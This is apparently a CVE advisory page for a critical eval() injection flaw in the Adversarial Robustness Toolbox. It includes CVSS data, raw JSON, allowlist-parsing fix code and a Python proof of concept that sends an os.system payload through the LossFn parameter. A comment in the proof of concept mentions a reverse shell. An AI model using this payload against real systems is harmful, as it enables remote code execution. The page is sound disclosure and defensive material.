Security Vulnerability Report
CVE-2026-31228 CVSS 9.8 CRITICAL

CVE-2026-31228

Published: 2026-05-12 16:16:15
Last Modified: 2026-05-13 15:52:26

Description

The Adversarial Robustness Toolbox (ART) through 1.20.1 contains a remote code execution vulnerability in its Kubeflow component. The robustness evaluation function for PyTorch models uses the unsafe eval() function to dynamically evaluate user-supplied strings for the LossFn and Optimizer parameters without any sanitization or security restrictions. An attacker can exploit this by providing a specially crafted string that contains arbitrary Python code, which will be executed when eval() is called, leading to complete compromise of the system running the ART evaluation.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Adversarial Robustness Toolbox (ART) <= 1.20.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# POC for CVE-2026-31228
# Vulnerability: Unsafe usage of eval() in ART PyTorch evaluation
import requests


def exploit(target_url):
    # Malicious payload to execute arbitrary Python code
    # Example: creating a file or establishing a reverse shell
    payload = "__import__('os').system('touch /tmp/poc_success')"

    # The vulnerable endpoint expects parameters for the robustness evaluation
    # 'LossFn' is the parameter that is passed to eval()
    data = {
        "model_name": "resnet50",
        "LossFn": payload,
        "Optimizer": "Adam"
    }

    try:
        response = requests.post(target_url, json=data, timeout=5)
        if response.status_code == 200:
            print(f"[+] Payload sent to {target_url}")
            print("[+] Check if /tmp/poc_success exists on the target server.")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")


if __name__ == "__main__":
    # Replace with actual target URL
    url = "http://vulnerable-art-service/api/v1/evaluate"
    exploit(url)
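Both the description and the PoC above turn on the same defect: the LossFn and Optimizer strings reach eval() unchanged. The fix a maintainer would apply is to parse the string as an AST and accept only an allowlisted name, optionally called with literal keyword arguments, without ever evaluating it. The code below is an added illustration written for this report, not ART's own code: parse_spec, is_safe_spec, UnsafeSpec and the two allowlist sets are hypothetical names, and the allowed names are a constructed subset of what a real deployment would register.

```python
"""Allowlist parsing of LossFn / Optimizer strings in place of eval().
Names and allowlists here are hypothetical, not ART's own API."""
import ast

# Constructed allowlists; a real service would map each name to a class,
# e.g. {"Adam": torch.optim.Adam}, and never resolve names with eval().
ALLOWED_LOSSES = {"CrossEntropyLoss", "MSELoss", "NLLLoss"}
ALLOWED_OPTIMIZERS = {"Adam", "SGD", "RMSprop"}


class UnsafeSpec(ValueError):
    """Spec is not a bare allowlisted name or a call with literal kwargs."""


def parse_spec(spec, allowed):
    """Return (name, kwargs) for "Adam" or "Adam(lr=0.01, betas=(0.9, 0.999))".
    Accepts only a Name, or a Call of a Name with literal keyword args; attribute
    access, dunder calls, positional args and **expansion are rejected unevaluated."""
    try:
        node = ast.parse(spec.strip(), mode="eval").body
    except (SyntaxError, ValueError) as exc:
        raise UnsafeSpec(f"not an expression: {spec!r}") from exc
    if isinstance(node, ast.Name):
        name, keywords = node.id, []
    elif isinstance(node, ast.Call) and isinstance(node.func, ast.Name) and not node.args:
        name, keywords = node.func.id, node.keywords
    else:
        raise UnsafeSpec(f"rejected shape: {spec!r}")
    if name not in allowed:
        raise UnsafeSpec(f"{name!r} is not an allowed name")
    kwargs = {}
    for kw in keywords:
        if kw.arg is None:  # **mapping expansion
            raise UnsafeSpec("keyword expansion is not allowed")
        try:  # literal_eval on the node: numbers, strings, tuples; no calls or names
            kwargs[kw.arg] = ast.literal_eval(kw.value)
        except (ValueError, TypeError) as exc:
            raise UnsafeSpec(f"non-literal value for {kw.arg!r}") from exc
    return name, kwargs


def is_safe_spec(spec, allowed):
    """Boolean form for request validation; rejected specs are worth logging."""
    try:
        parse_spec(spec, allowed)
        return True
    except UnsafeSpec:
        return False
```

The parsed (name, kwargs) pair is then looked up in a fixed name-to-class mapping, so the string itself is never executed.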

References

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-31228",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-12T16:16:14.633",
    "lastModified": "2026-05-13T15:52:25.637",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Adversarial Robustness Toolbox (ART) thru 1.20.1 contains a remote code execution vulnerability in its Kubeflow component. The robustness evaluation function for PyTorch models uses the unsafe eval() function to dynamically evaluate user-supplied strings for the LossFn and Optimizer parameters without any sanitization or security restrictions. An attacker can exploit this by providing a specially crafted string that contains arbitrary Python code, which will be executed when eval() is called, leading to complete compromise of the system running the ART evaluation."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-94"}]
      }
    ],
    "references": [
      {"url": "https://github.com/Trusted-AI/adversarial-robustness-toolbox", "source": "[email protected]"},
      {"url": "https://www.notion.so/CVE-2026-31228-35d1e1393188817f9ab0dc4b1651dfe9", "source": "[email protected]"}
    ]
  }
}